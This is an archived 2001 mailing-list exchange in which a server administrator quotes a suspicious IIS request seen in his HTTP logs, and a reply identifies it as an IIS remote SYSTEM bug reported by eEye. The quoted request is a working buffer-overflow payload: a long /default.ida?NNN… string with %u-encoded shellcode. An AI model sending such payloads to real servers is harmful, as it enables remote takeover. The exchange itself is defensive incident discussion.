On Thu, 19 Jul 2001, Admin @ Adopt A Band.com wrote:
> I have noticed today an explosion of hacking attempts on the http logs, the
> attackers (many different source IPs)
> are sending this string:
>
> GET
> /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%
> u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
>
> to which our RAQ4 answers (luckily) with a 400 not found ...
> But I guess that today there must have been some explot announced. Anybody
> knows anything about it? Reasons to be concerned?
> And, what would an .ida file be?
>
> Alessandro Bologna
That's a Micro$oft IIS remote SYSTEM bug, found by www.eEye.com. Nothing
to worry about on Linux based machines.
- shimi.
_______________________________________________
cobalt-developers mailing list
[EMAIL PROTECTED]
http://list.cobalt.com/mailman/listinfo/cobalt-developers
